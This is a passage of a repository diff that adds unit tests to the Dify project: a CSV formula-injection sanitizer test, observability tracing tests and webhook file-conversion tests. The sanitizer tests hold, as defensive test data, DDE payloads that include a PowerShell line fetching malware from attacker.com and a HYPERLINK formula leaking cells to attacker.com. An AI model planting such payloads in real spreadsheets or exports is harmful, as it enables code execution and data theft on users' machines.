mirror of
https://github.com/langgenius/dify.git
synced 2026-05-04 01:18:05 +08:00
Merge branch 'main' into feat/agent-node-v2
This commit is contained in:
@ -9,6 +9,7 @@ import io
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
from pandas.errors import ParserError
|
||||
from werkzeug.datastructures import FileStorage
|
||||
|
||||
from configs import dify_config
|
||||
@ -250,20 +251,22 @@ class TestAnnotationImportServiceValidation:
|
||||
"""Test that invalid CSV format is handled gracefully."""
|
||||
from services.annotation_service import AppAnnotationService
|
||||
|
||||
# Create invalid CSV content
|
||||
# Any content is fine once we force ParserError
|
||||
csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff'
|
||||
|
||||
file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
|
||||
|
||||
mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
|
||||
|
||||
with patch("services.annotation_service.current_account_with_tenant") as mock_auth:
|
||||
with (
|
||||
patch("services.annotation_service.current_account_with_tenant") as mock_auth,
|
||||
patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")),
|
||||
):
|
||||
mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id")
|
||||
|
||||
result = AppAnnotationService.batch_import_app_annotations("app_id", file)
|
||||
|
||||
# Should return error message
|
||||
assert "error_msg" in result
|
||||
assert "malformed" in result["error_msg"].lower()
|
||||
|
||||
def test_valid_import_succeeds(self, mock_app, mock_db_session):
|
||||
"""Test that valid import request succeeds."""
|
||||
|
||||
151
api/tests/unit_tests/core/helper/test_csv_sanitizer.py
Normal file
151
api/tests/unit_tests/core/helper/test_csv_sanitizer.py
Normal file
@ -0,0 +1,151 @@
|
||||
"""Unit tests for CSV sanitizer."""
|
||||
|
||||
from core.helper.csv_sanitizer import CSVSanitizer
|
||||
|
||||
|
||||
class TestCSVSanitizer:
|
||||
"""Test cases for CSV sanitization to prevent formula injection attacks."""
|
||||
|
||||
def test_sanitize_formula_equals(self):
|
||||
"""Test sanitizing values starting with = (most common formula injection)."""
|
||||
assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0"
|
||||
assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)"
|
||||
assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1"
|
||||
assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)"
|
||||
|
||||
def test_sanitize_formula_plus(self):
|
||||
"""Test sanitizing values starting with + (plus formula injection)."""
|
||||
assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc"
|
||||
assert CSVSanitizer.sanitize_value("+123") == "'+123"
|
||||
assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0"
|
||||
|
||||
def test_sanitize_formula_minus(self):
|
||||
"""Test sanitizing values starting with - (minus formula injection)."""
|
||||
assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc"
|
||||
assert CSVSanitizer.sanitize_value("-456") == "'-456"
|
||||
assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad"
|
||||
|
||||
def test_sanitize_formula_at(self):
|
||||
"""Test sanitizing values starting with @ (at-sign formula injection)."""
|
||||
assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc"
|
||||
assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)"
|
||||
|
||||
def test_sanitize_formula_tab(self):
|
||||
"""Test sanitizing values starting with tab character."""
|
||||
assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1"
|
||||
assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc"
|
||||
|
||||
def test_sanitize_formula_carriage_return(self):
|
||||
"""Test sanitizing values starting with carriage return."""
|
||||
assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1"
|
||||
assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd"
|
||||
|
||||
def test_sanitize_safe_values(self):
|
||||
"""Test that safe values are not modified."""
|
||||
assert CSVSanitizer.sanitize_value("Hello World") == "Hello World"
|
||||
assert CSVSanitizer.sanitize_value("123") == "123"
|
||||
assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com"
|
||||
assert CSVSanitizer.sanitize_value("Normal text") == "Normal text"
|
||||
assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?"
|
||||
|
||||
def test_sanitize_safe_values_with_special_chars_in_middle(self):
|
||||
"""Test that special characters in the middle are not escaped."""
|
||||
assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C"
|
||||
assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20"
|
||||
assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com"
|
||||
|
||||
def test_sanitize_empty_values(self):
|
||||
"""Test handling of empty values."""
|
||||
assert CSVSanitizer.sanitize_value("") == ""
|
||||
assert CSVSanitizer.sanitize_value(None) == ""
|
||||
|
||||
def test_sanitize_numeric_types(self):
|
||||
"""Test handling of numeric types."""
|
||||
assert CSVSanitizer.sanitize_value(123) == "123"
|
||||
assert CSVSanitizer.sanitize_value(456.789) == "456.789"
|
||||
assert CSVSanitizer.sanitize_value(0) == "0"
|
||||
# Negative numbers should be escaped (start with -)
|
||||
assert CSVSanitizer.sanitize_value(-123) == "'-123"
|
||||
|
||||
def test_sanitize_boolean_types(self):
|
||||
"""Test handling of boolean types."""
|
||||
assert CSVSanitizer.sanitize_value(True) == "True"
|
||||
assert CSVSanitizer.sanitize_value(False) == "False"
|
||||
|
||||
def test_sanitize_dict_with_specific_fields(self):
|
||||
"""Test sanitizing specific fields in a dictionary."""
|
||||
data = {
|
||||
"question": "=1+1",
|
||||
"answer": "+cmd|'/c calc",
|
||||
"safe_field": "Normal text",
|
||||
"id": "12345",
|
||||
}
|
||||
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"])
|
||||
|
||||
assert sanitized["question"] == "'=1+1"
|
||||
assert sanitized["answer"] == "'+cmd|'/c calc"
|
||||
assert sanitized["safe_field"] == "Normal text"
|
||||
assert sanitized["id"] == "12345"
|
||||
|
||||
def test_sanitize_dict_all_string_fields(self):
|
||||
"""Test sanitizing all string fields when no field list provided."""
|
||||
data = {
|
||||
"question": "=1+1",
|
||||
"answer": "+calc",
|
||||
"id": 123, # Not a string, should be ignored
|
||||
}
|
||||
sanitized = CSVSanitizer.sanitize_dict(data, None)
|
||||
|
||||
assert sanitized["question"] == "'=1+1"
|
||||
assert sanitized["answer"] == "'+calc"
|
||||
assert sanitized["id"] == 123 # Unchanged
|
||||
|
||||
def test_sanitize_dict_with_missing_fields(self):
|
||||
"""Test that missing fields in dict don't cause errors."""
|
||||
data = {"question": "=1+1"}
|
||||
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"])
|
||||
|
||||
assert sanitized["question"] == "'=1+1"
|
||||
assert "nonexistent_field" not in sanitized
|
||||
|
||||
def test_sanitize_dict_creates_copy(self):
|
||||
"""Test that sanitize_dict creates a copy and doesn't modify original."""
|
||||
original = {"question": "=1+1", "answer": "Normal"}
|
||||
sanitized = CSVSanitizer.sanitize_dict(original, ["question"])
|
||||
|
||||
assert original["question"] == "=1+1" # Original unchanged
|
||||
assert sanitized["question"] == "'=1+1" # Copy sanitized
|
||||
|
||||
def test_real_world_csv_injection_payloads(self):
|
||||
"""Test against real-world CSV injection attack payloads."""
|
||||
# Common DDE (Dynamic Data Exchange) attack payloads
|
||||
payloads = [
|
||||
"=cmd|'/c calc'!A0",
|
||||
"=cmd|'/c notepad'!A0",
|
||||
"+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'",
|
||||
"-2+3+cmd|'/c calc'",
|
||||
"@SUM(1+1)*cmd|'/c calc'",
|
||||
"=1+1+cmd|'/c calc'",
|
||||
'=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")',
|
||||
]
|
||||
|
||||
for payload in payloads:
|
||||
result = CSVSanitizer.sanitize_value(payload)
|
||||
# All should be prefixed with single quote
|
||||
assert result.startswith("'"), f"Payload not sanitized: {payload}"
|
||||
assert result == f"'{payload}", f"Unexpected sanitization for: {payload}"
|
||||
|
||||
def test_multiline_strings(self):
|
||||
"""Test handling of multiline strings."""
|
||||
multiline = "Line 1\nLine 2\nLine 3"
|
||||
assert CSVSanitizer.sanitize_value(multiline) == multiline
|
||||
|
||||
multiline_with_formula = "=SUM(A1)\nLine 2"
|
||||
assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}"
|
||||
|
||||
def test_whitespace_only_strings(self):
|
||||
"""Test handling of whitespace-only strings."""
|
||||
assert CSVSanitizer.sanitize_value(" ") == " "
|
||||
assert CSVSanitizer.sanitize_value("\n\n") == "\n\n"
|
||||
# Tab at start should be escaped
|
||||
assert CSVSanitizer.sanitize_value("\t ") == "'\t "
|
||||
@ -0,0 +1,101 @@
|
||||
"""
|
||||
Shared fixtures for ObservabilityLayer tests.
|
||||
"""
|
||||
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
from opentelemetry.sdk.trace import TracerProvider
|
||||
from opentelemetry.sdk.trace.export import SimpleSpanProcessor
|
||||
from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter
|
||||
from opentelemetry.trace import set_tracer_provider
|
||||
|
||||
from core.workflow.enums import NodeType
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def memory_span_exporter():
|
||||
"""Provide an in-memory span exporter for testing."""
|
||||
return InMemorySpanExporter()
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def tracer_provider_with_memory_exporter(memory_span_exporter):
|
||||
"""Provide a TracerProvider configured with memory exporter."""
|
||||
import opentelemetry.trace as trace_api
|
||||
|
||||
trace_api._TRACER_PROVIDER = None
|
||||
trace_api._TRACER_PROVIDER_SET_ONCE._done = False
|
||||
|
||||
provider = TracerProvider()
|
||||
processor = SimpleSpanProcessor(memory_span_exporter)
|
||||
provider.add_span_processor(processor)
|
||||
set_tracer_provider(provider)
|
||||
|
||||
yield provider
|
||||
|
||||
provider.force_flush()
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_start_node():
|
||||
"""Create a mock Start Node."""
|
||||
node = MagicMock()
|
||||
node.id = "test-start-node-id"
|
||||
node.title = "Start Node"
|
||||
node.execution_id = "test-start-execution-id"
|
||||
node.node_type = NodeType.START
|
||||
return node
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_llm_node():
|
||||
"""Create a mock LLM Node."""
|
||||
node = MagicMock()
|
||||
node.id = "test-llm-node-id"
|
||||
node.title = "LLM Node"
|
||||
node.execution_id = "test-llm-execution-id"
|
||||
node.node_type = NodeType.LLM
|
||||
return node
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_tool_node():
|
||||
"""Create a mock Tool Node with tool-specific attributes."""
|
||||
from core.tools.entities.tool_entities import ToolProviderType
|
||||
from core.workflow.nodes.tool.entities import ToolNodeData
|
||||
|
||||
node = MagicMock()
|
||||
node.id = "test-tool-node-id"
|
||||
node.title = "Test Tool Node"
|
||||
node.execution_id = "test-tool-execution-id"
|
||||
node.node_type = NodeType.TOOL
|
||||
|
||||
tool_data = ToolNodeData(
|
||||
title="Test Tool Node",
|
||||
desc=None,
|
||||
provider_id="test-provider-id",
|
||||
provider_type=ToolProviderType.BUILT_IN,
|
||||
provider_name="test-provider",
|
||||
tool_name="test-tool",
|
||||
tool_label="Test Tool",
|
||||
tool_configurations={},
|
||||
tool_parameters={},
|
||||
)
|
||||
node._node_data = tool_data
|
||||
|
||||
return node
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_is_instrument_flag_enabled_false():
|
||||
"""Mock is_instrument_flag_enabled to return False."""
|
||||
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False):
|
||||
yield
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def mock_is_instrument_flag_enabled_true():
|
||||
"""Mock is_instrument_flag_enabled to return True."""
|
||||
with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True):
|
||||
yield
|
||||
@ -0,0 +1,219 @@
|
||||
"""
|
||||
Tests for ObservabilityLayer.
|
||||
|
||||
Test coverage:
|
||||
- Initialization and enable/disable logic
|
||||
- Node span lifecycle (start, end, error handling)
|
||||
- Parser integration (default and tool-specific)
|
||||
- Graph lifecycle management
|
||||
- Disabled mode behavior
|
||||
"""
|
||||
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
from opentelemetry.trace import StatusCode
|
||||
|
||||
from core.workflow.enums import NodeType
|
||||
from core.workflow.graph_engine.layers.observability import ObservabilityLayer
|
||||
|
||||
|
||||
class TestObservabilityLayerInitialization:
|
||||
"""Test ObservabilityLayer initialization logic."""
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter):
|
||||
"""Test that layer initializes correctly when OTel is enabled."""
|
||||
layer = ObservabilityLayer()
|
||||
assert not layer._is_disabled
|
||||
assert layer._tracer is not None
|
||||
assert NodeType.TOOL in layer._parsers
|
||||
assert layer._default_parser is not None
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true")
|
||||
def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter):
|
||||
"""Test that layer enables when instrument flag is enabled."""
|
||||
layer = ObservabilityLayer()
|
||||
assert not layer._is_disabled
|
||||
assert layer._tracer is not None
|
||||
assert NodeType.TOOL in layer._parsers
|
||||
assert layer._default_parser is not None
|
||||
|
||||
|
||||
class TestObservabilityLayerNodeSpanLifecycle:
|
||||
"""Test node span creation and lifecycle management."""
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_node_span_created_and_ended(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
|
||||
):
|
||||
"""Test that span is created on node start and ended on node end."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_llm_node)
|
||||
layer.on_node_run_end(mock_llm_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 1
|
||||
assert spans[0].name == mock_llm_node.title
|
||||
assert spans[0].status.status_code == StatusCode.OK
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_node_error_recorded_in_span(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
|
||||
):
|
||||
"""Test that node execution errors are recorded in span."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
error = ValueError("Test error")
|
||||
layer.on_node_run_start(mock_llm_node)
|
||||
layer.on_node_run_end(mock_llm_node, error)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 1
|
||||
assert spans[0].status.status_code == StatusCode.ERROR
|
||||
assert len(spans[0].events) > 0
|
||||
assert any("exception" in event.name.lower() for event in spans[0].events)
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_node_end_without_start_handled_gracefully(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
|
||||
):
|
||||
"""Test that ending a node without start doesn't crash."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_end(mock_llm_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 0
|
||||
|
||||
|
||||
class TestObservabilityLayerParserIntegration:
|
||||
"""Test parser integration for different node types."""
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_default_parser_used_for_regular_node(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node
|
||||
):
|
||||
"""Test that default parser is used for non-tool nodes."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_start_node)
|
||||
layer.on_node_run_end(mock_start_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 1
|
||||
attrs = spans[0].attributes
|
||||
assert attrs["node.id"] == mock_start_node.id
|
||||
assert attrs["node.execution_id"] == mock_start_node.execution_id
|
||||
assert attrs["node.type"] == mock_start_node.node_type.value
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_tool_parser_used_for_tool_node(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node
|
||||
):
|
||||
"""Test that tool parser is used for tool nodes."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_tool_node)
|
||||
layer.on_node_run_end(mock_tool_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 1
|
||||
attrs = spans[0].attributes
|
||||
assert attrs["node.id"] == mock_tool_node.id
|
||||
assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id
|
||||
assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value
|
||||
assert attrs["tool.name"] == mock_tool_node._node_data.tool_name
|
||||
|
||||
|
||||
class TestObservabilityLayerGraphLifecycle:
|
||||
"""Test graph lifecycle management."""
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node):
|
||||
"""Test that on_graph_start clears node contexts."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_llm_node)
|
||||
assert len(layer._node_contexts) == 1
|
||||
|
||||
layer.on_graph_start()
|
||||
assert len(layer._node_contexts) == 0
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_on_graph_end_with_no_unfinished_spans(
|
||||
self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node
|
||||
):
|
||||
"""Test that on_graph_end handles normal completion."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_llm_node)
|
||||
layer.on_node_run_end(mock_llm_node, None)
|
||||
layer.on_graph_end(None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 1
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_on_graph_end_with_unfinished_spans_logs_warning(
|
||||
self, tracer_provider_with_memory_exporter, mock_llm_node, caplog
|
||||
):
|
||||
"""Test that on_graph_end logs warning for unfinished spans."""
|
||||
layer = ObservabilityLayer()
|
||||
layer.on_graph_start()
|
||||
|
||||
layer.on_node_run_start(mock_llm_node)
|
||||
assert len(layer._node_contexts) == 1
|
||||
|
||||
layer.on_graph_end(None)
|
||||
|
||||
assert len(layer._node_contexts) == 0
|
||||
assert "node spans were not properly ended" in caplog.text
|
||||
|
||||
|
||||
class TestObservabilityLayerDisabledMode:
|
||||
"""Test behavior when layer is disabled."""
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node):
|
||||
"""Test that disabled layer doesn't create spans on node start."""
|
||||
layer = ObservabilityLayer()
|
||||
assert layer._is_disabled
|
||||
|
||||
layer.on_graph_start()
|
||||
layer.on_node_run_start(mock_start_node)
|
||||
layer.on_node_run_end(mock_start_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 0
|
||||
|
||||
@patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False)
|
||||
@pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false")
|
||||
def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node):
|
||||
"""Test that disabled layer doesn't process node end."""
|
||||
layer = ObservabilityLayer()
|
||||
assert layer._is_disabled
|
||||
|
||||
layer.on_node_run_end(mock_llm_node, None)
|
||||
|
||||
spans = memory_span_exporter.get_finished_spans()
|
||||
assert len(spans) == 0
|
||||
@ -0,0 +1,452 @@
|
||||
"""
|
||||
Unit tests for webhook file conversion fix.
|
||||
|
||||
This test verifies that webhook trigger nodes properly convert file dictionaries
|
||||
to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error
|
||||
when passing files to downstream LLM nodes.
|
||||
"""
|
||||
|
||||
from unittest.mock import Mock, patch
|
||||
|
||||
from core.app.entities.app_invoke_entities import InvokeFrom
|
||||
from core.workflow.entities.graph_init_params import GraphInitParams
|
||||
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
|
||||
from core.workflow.nodes.trigger_webhook.entities import (
|
||||
ContentType,
|
||||
Method,
|
||||
WebhookBodyParameter,
|
||||
WebhookData,
|
||||
)
|
||||
from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode
|
||||
from core.workflow.runtime.graph_runtime_state import GraphRuntimeState
|
||||
from core.workflow.runtime.variable_pool import VariablePool
|
||||
from core.workflow.system_variable import SystemVariable
|
||||
from models.enums import UserFrom
|
||||
from models.workflow import WorkflowType
|
||||
|
||||
|
||||
def create_webhook_node(
|
||||
webhook_data: WebhookData,
|
||||
variable_pool: VariablePool,
|
||||
tenant_id: str = "test-tenant",
|
||||
) -> TriggerWebhookNode:
|
||||
"""Helper function to create a webhook node with proper initialization."""
|
||||
node_config = {
|
||||
"id": "webhook-node-1",
|
||||
"data": webhook_data.model_dump(),
|
||||
}
|
||||
|
||||
graph_init_params = GraphInitParams(
|
||||
tenant_id=tenant_id,
|
||||
app_id="test-app",
|
||||
workflow_type=WorkflowType.WORKFLOW,
|
||||
workflow_id="test-workflow",
|
||||
graph_config={},
|
||||
user_id="test-user",
|
||||
user_from=UserFrom.ACCOUNT,
|
||||
invoke_from=InvokeFrom.SERVICE_API,
|
||||
call_depth=0,
|
||||
)
|
||||
|
||||
runtime_state = GraphRuntimeState(
|
||||
variable_pool=variable_pool,
|
||||
start_at=0,
|
||||
)
|
||||
|
||||
node = TriggerWebhookNode(
|
||||
id="webhook-node-1",
|
||||
config=node_config,
|
||||
graph_init_params=graph_init_params,
|
||||
graph_runtime_state=runtime_state,
|
||||
)
|
||||
|
||||
# Attach a lightweight app_config onto runtime state for tenant lookups
|
||||
runtime_state.app_config = Mock()
|
||||
runtime_state.app_config.tenant_id = tenant_id
|
||||
|
||||
# Provide compatibility alias expected by node implementation
|
||||
# Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests
|
||||
node.node_id = node.id
|
||||
|
||||
return node
|
||||
|
||||
|
||||
def create_test_file_dict(
|
||||
filename: str = "test.jpg",
|
||||
file_type: str = "image",
|
||||
transfer_method: str = "local_file",
|
||||
) -> dict:
|
||||
"""Create a test file dictionary as it would come from webhook service."""
|
||||
return {
|
||||
"id": "file-123",
|
||||
"tenant_id": "test-tenant",
|
||||
"type": file_type,
|
||||
"filename": filename,
|
||||
"extension": ".jpg",
|
||||
"mime_type": "image/jpeg",
|
||||
"transfer_method": transfer_method,
|
||||
"related_id": "related-123",
|
||||
"storage_key": "storage-key-123",
|
||||
"size": 1024,
|
||||
"url": "https://example.com/test.jpg",
|
||||
"created_at": 1234567890,
|
||||
"used_at": None,
|
||||
"hash": "file-hash-123",
|
||||
}
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_to_file_variable():
|
||||
"""Test that webhook node converts file dictionaries to FileVariable objects."""
|
||||
# Create test file dictionary (as it comes from webhook service)
|
||||
file_dict = create_test_file_dict("uploaded_image.jpg")
|
||||
|
||||
data = WebhookData(
|
||||
title="Test Webhook with File",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="image_upload", type="file", required=True),
|
||||
WebhookBodyParameter(name="message", type="string", required=False),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {"message": "Test message"},
|
||||
"files": {
|
||||
"image_upload": file_dict,
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
# Mock the file factory and variable factory
|
||||
with (
|
||||
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
|
||||
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
|
||||
):
|
||||
# Setup mocks
|
||||
mock_file_obj = Mock()
|
||||
mock_file_obj.to_dict.return_value = file_dict
|
||||
mock_file_factory.return_value = mock_file_obj
|
||||
|
||||
mock_segment = Mock()
|
||||
mock_segment.value = mock_file_obj
|
||||
mock_segment_factory.return_value = mock_segment
|
||||
|
||||
mock_file_var_instance = Mock()
|
||||
mock_file_variable.return_value = mock_file_var_instance
|
||||
|
||||
# Run the node
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify file factory was called with correct parameters
|
||||
mock_file_factory.assert_called_once_with(
|
||||
mapping=file_dict,
|
||||
tenant_id="test-tenant",
|
||||
)
|
||||
|
||||
# Verify segment factory was called to create FileSegment
|
||||
mock_segment_factory.assert_called_once()
|
||||
|
||||
# Verify FileVariable was created with correct parameters
|
||||
mock_file_variable.assert_called_once()
|
||||
call_args = mock_file_variable.call_args[1]
|
||||
assert call_args["name"] == "image_upload"
|
||||
# value should be whatever build_segment_with_type.value returned
|
||||
assert call_args["value"] == mock_segment.value
|
||||
assert call_args["selector"] == ["webhook-node-1", "image_upload"]
|
||||
|
||||
# Verify output contains the FileVariable, not the original dict
|
||||
assert result.outputs["image_upload"] == mock_file_var_instance
|
||||
assert result.outputs["message"] == "Test message"
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_with_missing_files():
|
||||
"""Test webhook node file conversion with missing file parameter."""
|
||||
data = WebhookData(
|
||||
title="Test Webhook with Missing File",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="missing_file", type="file", required=False),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {}, # No files
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
# Run the node without patches (should handle None case gracefully)
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify missing file parameter is None
|
||||
assert result.outputs["_webhook_raw"]["files"] == {}
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_with_none_file():
|
||||
"""Test webhook node file conversion with None file value."""
|
||||
data = WebhookData(
|
||||
title="Test Webhook with None File",
|
||||
method=Method.POST,
|
||||
content_type=ContentType.FORM_DATA,
|
||||
body=[
|
||||
WebhookBodyParameter(name="none_file", type="file", required=False),
|
||||
],
|
||||
)
|
||||
|
||||
variable_pool = VariablePool(
|
||||
system_variables=SystemVariable.empty(),
|
||||
user_inputs={
|
||||
"webhook_data": {
|
||||
"headers": {},
|
||||
"query_params": {},
|
||||
"body": {},
|
||||
"files": {
|
||||
"file": None,
|
||||
},
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
node = create_webhook_node(data, variable_pool)
|
||||
|
||||
# Run the node without patches (should handle None case gracefully)
|
||||
result = node._run()
|
||||
|
||||
# Verify successful execution
|
||||
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
|
||||
|
||||
# Verify None file parameter is None
|
||||
assert result.outputs["_webhook_raw"]["files"]["file"] is None
|
||||
|
||||
|
||||
def test_webhook_node_file_conversion_with_non_dict_file():
|
||||
"""Test webhook node file conversion with non-dict file value."""
|
||||
data = WebhookData(
|
||||
title="Test Webhook with Non-Dict File",
|
||||
